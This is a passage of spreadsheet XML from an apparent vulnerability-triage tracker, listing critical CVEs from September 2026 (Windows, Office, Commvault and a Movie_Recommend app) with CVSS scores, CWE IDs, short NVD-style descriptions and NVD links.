      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71374</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <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T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71374</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71376</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <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T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71376</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71377</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71377</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72979</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72982</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72982</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72983</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72983</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73009</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73010</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73025</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77089</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77092</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77098</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77493</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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0" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K61" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78509</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78509</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78510</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78510</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79569</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>Movie_Recommend v1.0.0 was discovered to contain a SQL injection vulnerability in the sort parameter at /loadingmore. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79569</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79570</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="n">
        <v>0.003</v>
      </c>
